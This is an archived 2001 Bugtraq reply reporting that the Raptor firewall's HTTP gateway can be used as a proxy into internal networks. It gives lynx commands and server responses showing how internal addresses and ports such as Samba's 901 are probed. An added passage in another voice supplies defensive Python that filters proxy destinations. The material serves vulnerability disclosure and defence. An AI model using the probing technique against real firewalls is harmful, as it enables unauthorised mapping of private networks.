Bugtraq mailing list archives
Re: Raptor 6.5 http vulnerability
From: Alexander Bochmann <ab () GXIS DE>
Date: Mon, 26 Mar 2001 17:11:45 +0200
Hi,

...on Sat, Mar 24, 2001 at 05:55:29PM +0100, Lysel Christian Emre wrote:
> 1. Problem Description
>
> The Raptor firewall is vulnerable to forwarding http requests to other port numbers than 80 if a rule allows http traffic. When an external or internal client configures itself to use the nearest interface as proxy, it's possible to access other ports than 80 on the target host.
>
> 2.1 Non Vulnerable Versions
>
> Raptor firewall 6.0.2.
Depending on the configuration and on how you try it, 6.0.2 also seems to be vulnerable.

I already noticed some months ago that the Raptor (6.0.2) firewall's http gateway possibly leaks information about an internal network with the method you described, if redirected services are used. It's possible to brute-force IP addresses used on a DMZ network: If you use the http gateway on the external interface as proxy, you can access internal IPs (and internal DNS names) directly - just try them all ;)

Example:
setenv http_proxy http://external.firewall.name:80/
Now go on with something like...
lynx -mime_header http://192.168.95.1:80/
...you will either get 403 or 503 errors from the gateway (depending on its configuration) for the destination:
lynx -mime_header http://192.168.95.2:80/
HTTP/1.1 503 Service Unavailable
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Mon, 26 Mar 2001 14:59:29 GMT
Connection: close
Content-Type: text/html
[.. etc ..]

...or, if you are lucky, an answer from a web server:

% lynx -mime_header http://192.168.95.74:80/
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2001 14:43:19 GMT
Server: Apache/1.3.17 (Unix) mod_perl/1.24_01 PHP/3.0.18
Last-Modified: Thu, 15 Feb 2001 08:23:04 GMT
Accept-Ranges: bytes
Content-Length: 2490
Connection: close
Content-Type: text/html

<!doctype html public "-//IETF//DTD HTML//EN">
[.. etc ..]

On this host, you can now try connections to other ports, for example:

% lynx -mime_header http://192.168.95.74:901/
HTTP/1.0 400 Server Error
Connection: close
Content-Type: text/html

<HTML><HEAD><TITLE>400 Server Error</TITLE></HEAD><BODY><H1>400 Server Error</H1>Samba is configured to deny access from this client <br>Check your "hosts allow" and "hosts deny" options in smb.conf <p></BODY></HTML>

Oh well, at least they didn't trust all internal IPs ;)

Alex.
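The behaviour described in this thread amounts to the gateway acting as an open forward proxy for its external interface. As an added example (my own code, not Raptor's), here is the destination check such a gateway should apply before relaying an absolute-URI request: parse the proxy target out of the request line, allow only port 80 as the "http" rule intends, refuse any literal internal address outright, and otherwise relay only to an explicit list of published hosts. The published host name and the address ranges are assumed values.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed policy values for a gateway's external interface: the servers it
# publishes (hypothetical name), the ports an "http" rule is meant to cover,
# and ranges that must never be reachable through it (RFC 1918 + loopback).
PUBLISHED_HOSTS = {"www.example.com"}
ALLOWED_PORTS = {80}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def parse_proxy_target(request_line):
    """Return (host, port) from an absolute-URI request line such as
    'GET http://192.168.95.74:901/ HTTP/1.0', the form a client sends once
    it has been pointed at the gateway as its proxy."""
    fields = request_line.split()
    if len(fields) < 2:
        raise ValueError("malformed request line: %r" % request_line)
    parts = urlsplit(fields[1])
    if parts.scheme != "http" or not parts.hostname:
        raise ValueError("not an absolute http URI: %r" % fields[1])
    return parts.hostname, parts.port or 80   # .port raises ValueError on junk

def forward_decision(request_line):
    """Decide whether the gateway may relay the request -> (allowed, reason).
    Order: port, then literal-IP fail-safe, then published-host allow-list.
    Names are not resolved here; a published name that resolves to an internal
    address still needs a DNS-side check."""
    host, port = parse_proxy_target(request_line)
    if port not in ALLOWED_PORTS:
        return False, "port %d is not covered by the http rule" % port
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None   # a DNS name, not a literal address
    if addr is not None:
        if any(addr in net for net in INTERNAL_NETS):
            return False, "internal address %s is never relayed" % host
        return False, "literal address %s is not a published host" % host
    if host not in PUBLISHED_HOSTS:
        return False, "host %s is not published" % host
    return True, "ok"

if __name__ == "__main__":
    # The destinations from the post, plus one the policy permits.
    for line in ("GET http://192.168.95.74:80/ HTTP/1.0",
                 "GET http://192.168.95.74:901/ HTTP/1.0",
                 "GET http://www.example.com/ HTTP/1.0"):
        print(line, "->", forward_decision(line))
```

Logging the returned reason per client gives a cheap scan indicator: one external client collecting many "internal address ... is never relayed" denials across consecutive addresses is exactly the enumeration Alex describes.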
Current thread:
- Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)